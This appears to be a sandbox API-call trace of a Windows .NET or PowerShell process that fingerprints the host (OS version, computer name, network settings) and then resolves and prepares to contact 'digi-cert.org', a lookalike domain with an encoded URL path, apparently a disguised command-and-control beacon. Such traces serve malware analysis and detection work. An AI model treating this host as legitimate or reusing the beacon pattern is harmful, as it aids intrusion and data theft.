	[0063.248] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x350199e1e8 | out: TokenHandle=0x350199e1e8*=0x6a8) returned 1
	[0063.260] GetCurrentProcess () returned 0xffffffffffffffff
	[0063.260] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x350199de68 | out: TokenHandle=0x350199de68*=0x6ac) returned 1
	[0063.275] GetCurrentProcess () returned 0xffffffffffffffff
	[0063.275] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x350199de68 | out: TokenHandle=0x350199de68*=0x6b0) returned 1
	[0063.289] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x20019, phkResult=0x350199d528 | out: phkResult=0x350199d528*=0x6b4) returned 0x0
	[0063.289] RegQueryValueExW (in: hKey=0x6b4, lpValueName="InstallationType", lpReserved=0x0, lpType=0x350199d4ac, lpData=0x0, lpcbData=0x350199d4a8*=0x0 | out: lpType=0x350199d4ac*=0x1, lpData=0x0, lpcbData=0x350199d4a8*=0xe) returned 0x0
	[0063.289] CoTaskMemAlloc (cb=0x12) returned 0x233fc639ff0
	[0063.289] RegQueryValueExW (in: hKey=0x6b4, lpValueName="InstallationType", lpReserved=0x0, lpType=0x350199d47c, lpData=0x233fc639ff0, lpcbData=0x350199d478*=0xe | out: lpType=0x350199d47c*=0x1, lpData="Client", lpcbData=0x350199d478*=0xe) returned 0x0
	[0063.289] CoTaskMemFree (pv=0x233fc639ff0) 
	[0063.289] RegCloseKey (hKey=0x6b4) returned 0x0
	[0063.298] GetCurrentProcessId () returned 0xd94
	[0063.306] CoTaskMemAlloc (cb=0x204) returned 0x233e12da1a0
	[0063.306] GetComputerNameW (in: lpBuffer=0x233e12da1a0, nSize=0x233e43bb948 | out: lpBuffer="X2VS1CUM", nSize=0x233e43bb948) returned 1
	[0063.306] CoTaskMemFree (pv=0x233e12da1a0) 
	[0063.308] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\.NET CLR Networking\\Performance", ulOptions=0x0, samDesired=0x20019, phkResult=0x350199e348 | out: phkResult=0x350199e348*=0x6b4) returned 0x0
	[0063.309] RegQueryValueExW (in: hKey=0x6b4, lpValueName="Library", lpReserved=0x0, lpType=0x350199e2ac, lpData=0x0, lpcbData=0x350199e2a8*=0x0 | out: lpType=0x350199e2ac*=0x2, lpData=0x0, lpcbData=0x350199e2a8*=0x48) returned 0x0
	[0063.309] CoTaskMemAlloc (cb=0x4c) returned 0x233e39fe240
	[0063.309] RegQueryValueExW (in: hKey=0x6b4, lpValueName="Library", lpReserved=0x0, lpType=0x350199e27c, lpData=0x233e39fe240, lpcbData=0x350199e278*=0x48 | out: lpType=0x350199e27c*=0x2, lpData="%systemroot%\\system32\\netfxperf.dll", lpcbData=0x350199e278*=0x48) returned 0x0
	[0063.309] CoTaskMemFree (pv=0x233e39fe240) 
	[0063.309] RegQueryValueExW (in: hKey=0x6b4, lpValueName="IsMultiInstance", lpReserved=0x0, lpType=0x350199e2cc, lpData=0x0, lpcbData=0x350199e2c8*=0x0 | out: lpType=0x350199e2cc*=0x4, lpData=0x0, lpcbData=0x350199e2c8*=0x4) returned 0x0
	[0063.309] RegQueryValueExW (in: hKey=0x6b4, lpValueName="IsMultiInstance", lpReserved=0x0, lpType=0x350199e2d0, lpData=0x350199e2cc, lpcbData=0x350199e2c8*=0x4 | out: lpType=0x350199e2d0*=0x4, lpData=0x350199e2cc*=0x1, lpcbData=0x350199e2c8*=0x4) returned 0x0
	[0063.309] RegQueryValueExW (in: hKey=0x6b4, lpValueName="First Counter", lpReserved=0x0, lpType=0x350199e2cc, lpData=0x0, lpcbData=0x350199e2c8*=0x0 | out: lpType=0x350199e2cc*=0x4, lpData=0x0, lpcbData=0x350199e2c8*=0x4) returned 0x0
	[0063.309] RegQueryValueExW (in: hKey=0x6b4, lpValueName="First Counter", lpReserved=0x0, lpType=0x350199e2d0, lpData=0x350199e2cc, lpcbData=0x350199e2c8*=0x4 | out: lpType=0x350199e2d0*=0x4, lpData=0x350199e2cc*=0x1770, lpcbData=0x350199e2c8*=0x4) returned 0x0
	[0063.309] RegCloseKey (hKey=0x6b4) returned 0x0
	[0063.312] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\.net clr networking\\Performance", ulOptions=0x0, samDesired=0x20019, phkResult=0x350199e308 | out: phkResult=0x350199e308*=0x6b4) returned 0x0
	[0063.312] RegQueryValueExW (in: hKey=0x6b4, lpValueName="CategoryOptions", lpReserved=0x0, lpType=0x350199e28c, lpData=0x0, lpcbData=0x350199e288*=0x0 | out: lpType=0x350199e28c*=0x4, lpData=0x0, lpcbData=0x350199e288*=0x4) returned 0x0
	[0063.312] RegQueryValueExW (in: hKey=0x6b4, lpValueName="CategoryOptions", lpReserved=0x0, lpType=0x350199e290, lpData=0x350199e28c, lpcbData=0x350199e288*=0x4 | out: lpType=0x350199e290*=0x4, lpData=0x350199e28c*=0x3, lpcbData=0x350199e288*=0x4) returned 0x0
	[0063.312] RegQueryValueExW (in: hKey=0x6b4, lpValueName="FileMappingSize", lpReserved=0x0, lpType=0x350199e28c, lpData=0x0, lpcbData=0x350199e288*=0x0 | out: lpType=0x350199e28c*=0x4, lpData=0x0, lpcbData=0x350199e288*=0x4) returned 0x0
	[0063.312] RegQueryValueExW (in: hKey=0x6b4, lpValueName="FileMappingSize", lpReserved=0x0, lpType=0x350199e290, lpData=0x350199e28c, lpcbData=0x350199e288*=0x4 | out: lpType=0x350199e290*=0x4, lpData=0x350199e28c*=0x20000, lpcbData=0x350199e288*=0x4) returned 0x0
	[0063.312] RegQueryValueExW (in: hKey=0x6b4, lpValueName="Counter Names", lpReserved=0x0, lpType=0x350199e28c, lpData=0x0, lpcbData=0x350199e288*=0x0 | out: lpType=0x350199e28c*=0x3, lpData=0x0, lpcbData=0x350199e288*=0xaa) returned 0x0
	[0063.312] RegQueryValueExW (in: hKey=0x6b4, lpValueName="Counter Names", lpReserved=0x0, lpType=0x350199e28c, lpData=0x233e43bebd0, lpcbData=0x350199e288*=0xaa | out: lpType=0x350199e28c*=0x3, lpData=0x233e43bebd0*, lpcbData=0x350199e288*=0xaa) returned 0x0
	[0063.314] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1
	[0063.317] CreateFileMappingW (hFile=0xffffffffffffffff, lpFileMappingAttributes=0x350199e240, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x20000, lpName="Global\\netfxcustomperfcounters.1.0.net clr networking") returned 0x418
	[0063.318] MapViewOfFile (hFileMappingObject=0x418, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x233fc840000
	[0063.319] VirtualQuery (in: lpAddress=0x233fc840000, lpBuffer=0x350199e238, dwLength=0x30 | out: lpBuffer=0x350199e238*(BaseAddress=0x233fc840000, AllocationBase=0x233fc840000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x20000, State=0x1000, Protect=0x4, Type=0x40000, __alignment2=0x35)) returned 0x30
	[0063.319] LocalFree (hMem=0x233e3a0a1f0) returned 0x0
	[0063.319] RegCloseKey (hKey=0x6b4) returned 0x0
	[0063.320] GetVersionExW (in: lpVersionInformation=0x350199d210*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x350199d210*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1
	[0063.321] GetVersionExW (in: lpVersionInformation=0x350199d1e0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x350199d1e0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1
	[0063.322] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x233e43bf810, cbSid=0x350199e220 | out: pSid=0x233e43bf810*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x350199e220) returned 1
	[0063.323] CreateMutexW (lpMutexAttributes=0x233e43bfa18, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x6b4
	[0063.325] WaitForSingleObject (hHandle=0x6b4, dwMilliseconds=0x1f4) returned 0x0
	[0063.325] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x233e43bfd30, cbSid=0x350199e180 | out: pSid=0x233e43bfd30*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x350199e180) returned 1
	[0063.325] CreateMutexW (lpMutexAttributes=0x233e43bfee8, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x0
	[0063.325] OpenMutexW (dwDesiredAccess=0x100001, bInheritHandle=0, lpName="Global\\.net clr networking") returned 0x6c4
	[0063.326] WaitForSingleObject (hHandle=0x6c4, dwMilliseconds=0x1f4) returned 0x0
	[0063.326] ReleaseMutex (hMutex=0x6c4) returned 1
	[0063.326] CloseHandle (hObject=0x6c4) returned 1
	[0063.327] GetCurrentProcessId () returned 0xd94
	[0063.329] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd94) returned 0x6c4
	[0063.330] GetProcessTimes (in: hProcess=0x6c4, lpCreationTime=0x350199e190, lpExitTime=0x350199e188, lpKernelTime=0x350199e180, lpUserTime=0x350199e178 | out: lpCreationTime=0x350199e190, lpExitTime=0x350199e188, lpKernelTime=0x350199e180, lpUserTime=0x350199e178) returned 1
	[0063.330] CloseHandle (hObject=0x6c4) returned 1
	[0063.330] ReleaseMutex (hMutex=0x6b4) returned 1
	[0063.330] CloseHandle (hObject=0x6b4) returned 1
	[0063.330] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x233e43c0bd0, cbSid=0x350199e220 | out: pSid=0x233e43c0bd0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x350199e220) returned 1
	[0063.331] CreateMutexW (lpMutexAttributes=0x233e43c0d88, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x6b4
	[0063.331] WaitForSingleObject (hHandle=0x6b4, dwMilliseconds=0x1f4) returned 0x0
	[0063.332] ReleaseMutex (hMutex=0x6b4) returned 1
	[0063.332] CloseHandle (hObject=0x6b4) returned 1
	[0063.332] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x233e43c1870, cbSid=0x350199e220 | out: pSid=0x233e43c1870*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x350199e220) returned 1
	[0063.332] CreateMutexW (lpMutexAttributes=0x233e43c1a28, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x6b4
	[0063.332] WaitForSingleObject (hHandle=0x6b4, dwMilliseconds=0x1f4) returned 0x0
	[0063.333] ReleaseMutex (hMutex=0x6b4) returned 1
	[0063.333] CloseHandle (hObject=0x6b4) returned 1
	[0063.333] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x233e43c2508, cbSid=0x350199e220 | out: pSid=0x233e43c2508*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x350199e220) returned 1
	[0063.333] CreateMutexW (lpMutexAttributes=0x233e43c26c0, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x6b4
	[0063.333] WaitForSingleObject (hHandle=0x6b4, dwMilliseconds=0x1f4) returned 0x0
	[0063.334] ReleaseMutex (hMutex=0x6b4) returned 1
	[0063.334] CloseHandle (hObject=0x6b4) returned 1
	[0063.334] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x233e43c3198, cbSid=0x350199e220 | out: pSid=0x233e43c3198*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x350199e220) returned 1
	[0063.334] CreateMutexW (lpMutexAttributes=0x233e43c3350, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x6b4
	[0063.334] WaitForSingleObject (hHandle=0x6b4, dwMilliseconds=0x1f4) returned 0x0
	[0063.334] ReleaseMutex (hMutex=0x6b4) returned 1
	[0063.334] CloseHandle (hObject=0x6b4) returned 1
	[0063.335] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x233e43c3e28, cbSid=0x350199e1d0 | out: pSid=0x233e43c3e28*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x350199e1d0) returned 1
	[0063.336] CreateMutexW (lpMutexAttributes=0x233e43c3fe0, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x6b4
	[0063.336] WaitForSingleObject (hHandle=0x6b4, dwMilliseconds=0x1f4) returned 0x0
	[0063.336] ReleaseMutex (hMutex=0x6b4) returned 1
	[0063.336] CloseHandle (hObject=0x6b4) returned 1
	[0063.336] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x233e43c4ad0, cbSid=0x350199e1d0 | out: pSid=0x233e43c4ad0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x350199e1d0) returned 1
	[0063.336] CreateMutexW (lpMutexAttributes=0x233e43c4c88, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x6b4
	[0063.336] WaitForSingleObject (hHandle=0x6b4, dwMilliseconds=0x1f4) returned 0x0
	[0063.337] ReleaseMutex (hMutex=0x6b4) returned 1
	[0063.337] CloseHandle (hObject=0x6b4) returned 1
	[0063.337] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x233e43c5748, cbSid=0x350199e1d0 | out: pSid=0x233e43c5748*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x350199e1d0) returned 1
	[0063.337] CreateMutexW (lpMutexAttributes=0x233e43c5900, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x6b4
	[0063.337] WaitForSingleObject (hHandle=0x6b4, dwMilliseconds=0x1f4) returned 0x0
	[0063.338] ReleaseMutex (hMutex=0x6b4) returned 1
	[0063.338] CloseHandle (hObject=0x6b4) returned 1
	[0063.338] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x233e43c63d0, cbSid=0x350199e1d0 | out: pSid=0x233e43c63d0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x350199e1d0) returned 1
	[0063.338] CreateMutexW (lpMutexAttributes=0x233e43c6588, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x6b4
	[0063.338] WaitForSingleObject (hHandle=0x6b4, dwMilliseconds=0x1f4) returned 0x0
	[0063.338] ReleaseMutex (hMutex=0x6b4) returned 1
	[0063.339] CloseHandle (hObject=0x6b4) returned 1
	[0063.339] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x233e43c7050, cbSid=0x350199e1d0 | out: pSid=0x233e43c7050*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x350199e1d0) returned 1
	[0063.339] CreateMutexW (lpMutexAttributes=0x233e43c7208, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x6b4
	[0063.339] WaitForSingleObject (hHandle=0x6b4, dwMilliseconds=0x1f4) returned 0x0
	[0063.339] ReleaseMutex (hMutex=0x6b4) returned 1
	[0063.339] CloseHandle (hObject=0x6b4) returned 1
	[0063.346] CoTaskMemAlloc (cb=0x104) returned 0x233e39e8eb0
	[0063.346] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x233e39e8eb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0063.346] CoTaskMemFree (pv=0x233e39e8eb0) 
	[0063.347] CoTaskMemAlloc (cb=0x104) returned 0x233e39e8850
	[0063.347] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x233e39e8850, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0063.347] CoTaskMemFree (pv=0x233e39e8850) 
	[0063.452] CoTaskMemAlloc (cb=0x104) returned 0x233e39e7b90
	[0063.452] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x233e39e7b90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0063.452] CoTaskMemFree (pv=0x233e39e7b90) 
	[0063.467] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x6b4
	[0063.467] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x6c4
	[0063.694] GetCurrentProcess () returned 0xffffffffffffffff
	[0063.694] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x350199dd98 | out: TokenHandle=0x350199dd98*=0x6c8) returned 1
	[0063.698] GetCurrentProcess () returned 0xffffffffffffffff
	[0063.698] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x350199dd98 | out: TokenHandle=0x350199dd98*=0x6cc) returned 1
	[0063.701] GetCurrentProcess () returned 0xffffffffffffffff
	[0063.701] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x350199e3d8 | out: TokenHandle=0x350199e3d8*=0x6d0) returned 1
	[0063.730] CoTaskMemAlloc (cb=0xcd0) returned 0x233e39a9930
	[0063.731] RasEnumConnectionsW (in: param_1=0x233e39a9930, param_2=0x350199e3fc, param_3=0x350199e3f8 | out: param_1=0x233e39a9930, param_2=0x350199e3fc, param_3=0x350199e3f8) returned 0x0
	[0063.738] CoTaskMemFree (pv=0x233e39a9930) 
	[0063.742] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x350199e208 | out: lpWSAData=0x350199e208) returned 0
	[0063.744] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) returned 0x70c
	[0063.745] setsockopt (s=0x70c, level=65535, optname=128, optval="\x01", optlen=4) returned -1
	[0063.745] closesocket (s=0x70c) returned 0
	[0063.745] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) returned 0x70c
	[0063.745] setsockopt (s=0x70c, level=65535, optname=128, optval="\x01", optlen=4) returned -1
	[0063.745] closesocket (s=0x70c) returned 0
	[0063.746] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x70c
	[0063.746] ioctlsocket (in: s=0x70c, cmd=-2147195266, argp=0x350199e428 | out: argp=0x350199e428) returned 0
	[0063.747] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x714
	[0063.747] ioctlsocket (in: s=0x714, cmd=-2147195266, argp=0x350199e428 | out: argp=0x350199e428) returned 0
	[0063.750] WSAIoctl (in: s=0x70c, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x350199e368, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x350199e368, lpOverlapped=0x0) returned -1
	[0063.752] CoTaskMemAlloc (cb=0x204) returned 0x233e12da1a0
	[0063.752] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x233e12da1a0, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45
	[0063.752] CoTaskMemFree (pv=0x233e12da1a0) 
	[0063.753] WSAEventSelect (s=0x70c, hEventObject=0x710, lNetworkEvents=512) returned 0
	[0063.753] WSAIoctl (in: s=0x714, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x350199e368, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x350199e368, lpOverlapped=0x0) returned -1
	[0063.753] CoTaskMemAlloc (cb=0x204) returned 0x233e12da1a0
	[0063.753] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x233e12da1a0, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45
	[0063.753] CoTaskMemFree (pv=0x233e12da1a0) 
	[0063.753] WSAEventSelect (s=0x714, hEventObject=0x718, lNetworkEvents=512) returned 0
	[0063.754] RasConnectionNotificationW (param_1=0xffffffffffffffff, param_2=0x71c, param_3=0x3) returned 0x0
	[0063.758] RegOpenCurrentUser (in: samDesired=0x20019, phkResult=0x350199e500 | out: phkResult=0x350199e500*=0x734) returned 0x0
	[0063.759] RegOpenKeyExW (in: hKey=0x734, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x350199e3e8 | out: phkResult=0x350199e3e8*=0x738) returned 0x0
	[0063.759] RegNotifyChangeKeyValue (hKey=0x738, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x73c, fAsynchronous=1) returned 0x0
	[0063.760] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x350199e410 | out: phkResult=0x350199e410*=0x740) returned 0x0
	[0063.760] RegNotifyChangeKeyValue (hKey=0x740, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x744, fAsynchronous=1) returned 0x0
	[0063.760] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x350199e410 | out: phkResult=0x350199e410*=0x748) returned 0x0
	[0063.760] RegNotifyChangeKeyValue (hKey=0x748, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x74c, fAsynchronous=1) returned 0x0
	[0063.761] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x350199e378 | out: TokenHandle=0x350199e378*=0x750) returned 1
	[0063.761] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework", ulOptions=0x0, samDesired=0x20019, phkResult=0x350199d498 | out: phkResult=0x350199d498*=0x754) returned 0x0
	[0063.761] RegQueryValueExW (in: hKey=0x754, lpValueName="LegacyWPADSupport", lpReserved=0x0, lpType=0x350199d4ac, lpData=0x0, lpcbData=0x350199d4a8*=0x0 | out: lpType=0x350199d4ac*=0x0, lpData=0x0, lpcbData=0x350199d4a8*=0x0) returned 0x2
	[0063.774] RegCloseKey (hKey=0x754) returned 0x0
	[0063.779] WinHttpOpen (pszAgentW=0x0, dwAccessType=0x1, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x233e39fac40
	[0063.780] WinHttpSetTimeouts (hInternet=0x233e39fac40, nResolveTimeout=60000, nConnectTimeout=60000, nSendTimeout=60000, nReceiveTimeout=60000) returned 1
	[0063.782] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0x350199e458 | out: pProxyConfig=0x350199e458) returned 1
	[0063.997] GetCurrentProcess () returned 0xffffffffffffffff
	[0063.997] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x350199da28 | out: TokenHandle=0x350199da28*=0x6c0) returned 1
	[0064.010] GetCurrentProcess () returned 0xffffffffffffffff
	[0064.010] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x350199da28 | out: TokenHandle=0x350199da28*=0x774) returned 1
	[0064.020] GetCurrentProcess () returned 0xffffffffffffffff
	[0064.020] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x350199d9f8 | out: TokenHandle=0x350199d9f8*=0x778) returned 1
	[0064.023] GetCurrentProcess () returned 0xffffffffffffffff
	[0064.023] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x350199d9f8 | out: TokenHandle=0x350199d9f8*=0x77c) returned 1
	[0064.031] GetCurrentProcess () returned 0xffffffffffffffff
	[0064.031] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x350199d898 | out: TokenHandle=0x350199d898*=0x780) returned 1
	[0064.034] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x350199d898 | out: TokenHandle=0x350199d898*=0x784) returned 1
	[0064.043] WinHttpGetProxyForUrl (in: hSession=0x233e39fac40, lpcwszUrl="https://digi-cert.org/MFEwRzBNMEswSAAJBgUrCgMCHgUABBSAUQYBMq2awn1Rh6Doh", pAutoProxyOptions=0x350199ded8, pProxyInfo=0x350199dea8 | out: pProxyInfo=0x350199dea8) returned 0
	[0064.048] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x350199d828 | out: TokenHandle=0x350199d828*=0x7a0) returned 1
	[0064.050] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x350199d828 | out: TokenHandle=0x350199d828*=0x79c) returned 1
	[0064.051] SetEvent (hEvent=0x6b4) returned 1
	[0064.067] SetEvent (hEvent=0x6b4) returned 1
	[0064.076] GetNetworkParams (in: pFixedInfo=0x0, pOutBufLen=0x350199dc38 | out: pFixedInfo=0x0, pOutBufLen=0x350199dc38) returned 0x6f
	[0064.084] LocalAlloc (uFlags=0x0, uBytes=0x258) returned 0x233fc63bf50
	[0064.084] GetNetworkParams (in: pFixedInfo=0x233fc63bf50, pOutBufLen=0x350199dc38 | out: pFixedInfo=0x233fc63bf50, pOutBufLen=0x350199dc38) returned 0x0
	[0064.091] CoTaskMemAlloc (cb=0xd) returned 0x233e39ac3c0
	[0064.091] inet_addr (cp="192.168.0.1") returned 0x100a8c0
	[0064.091] CoTaskMemFree (pv=0x233e39ac3c0) 
	[0064.108] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x7cc
	[0064.108] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x798
	[0064.110] CoTaskMemAlloc (cb=0xf) returned 0x233e39ac200
	[0064.110] getaddrinfo (in: pNodeName="digi-cert.org", pServiceName=0x0, pHints=0x350199dbe0*(ai_flags=2, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x350199dbd8 | out: ppResult=0x350199dbd8*=0x233fc638120*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="digi-cert.org", ai_addr=0x233e39ac660*(sa_family=2, sin_port=0x0, sin_addr="162.243.19.12"), ai_next=0x0)) returned 0
	[0064.114] CoTaskMemFree (pv=0x233e39ac200) 
	[0064.114] CoTaskMemFree (pv=0x0) 
	[0064.115] FreeAddrInfoW (pAddrInfo=0x233fc638120*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="楤楧挭牥⹴牯g", ai_addr=0x233e39ac660*(sa_family=2, sin_port=0x0, sin_addr="162.243.19.12"), ai_next=0x0)) 
	[0064.115] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x7d4
